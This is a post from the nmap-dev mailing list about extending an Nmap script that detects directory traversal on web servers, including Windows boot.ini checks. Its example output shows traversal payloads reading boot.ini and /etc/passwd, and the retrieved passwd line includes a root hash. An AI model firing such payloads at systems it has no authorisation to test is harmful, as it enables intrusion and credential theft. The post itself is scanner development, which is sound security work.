Re: [NSE] Webservers Directory Traversal Vulnerability (under windows)

[Gutek <ange.gutek () gmail com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Here is a merged version.
I just added checkings for boot.ini in the original generic directory
escalation strings table. Those are "dot and slashes hexified".

Then I added another table for more specific payloads. The script has to
deal with them in a different way than the generic ones: they can not
always be fully hexified, sometimes they need special prepend/append...
in a word, those strings have to be passed "as published" through the
GET request.

Concerning boot.ini: it exists on Windows <=XP, not on neither Vista nor
Seven.

Example Outputs :

- -- @output
- -- 80/tcp open  http
- -- | http-passwd: Directory Traversal Found.
- -- | Payload: "index.html?../../../../../boot.ini"
- -- | Printing first 250 bytes:
- -- | [boot loader]
- -- | timeout=30
- -- | default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
- -- | [operating systems]
- -- |_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP
Professional" /noexecute=optin /fastdetect
- --
- --
- -- 80/tcp open  http
- -- | http-passwd: Directory Traversal Found.
- -- | Payload: "../../../../../../../../../../etc/passwd"
- -- | Printing first 250 bytes:
- -- | root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
- -- | sshd:*:65532:65534::/:/bin/false
- -- | ftp:*:65533:65534::/:/bin/false
- -- |_nobody:*:65534:65534::/:/bin/fals

A.G.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (GNU/Linux)
Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/

iEYEARECAAYFAkwc5fcACgkQ3aDTTO0ha7gQRQCfb9C72W3LHiunochL+S4G0rm3
fxkAoIROyqhoB1xoM84KX79IHrwYePUY
=2Jlp
-----END PGP SIGNATURE-----

Attachment: http-passwd.nse
Description:

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/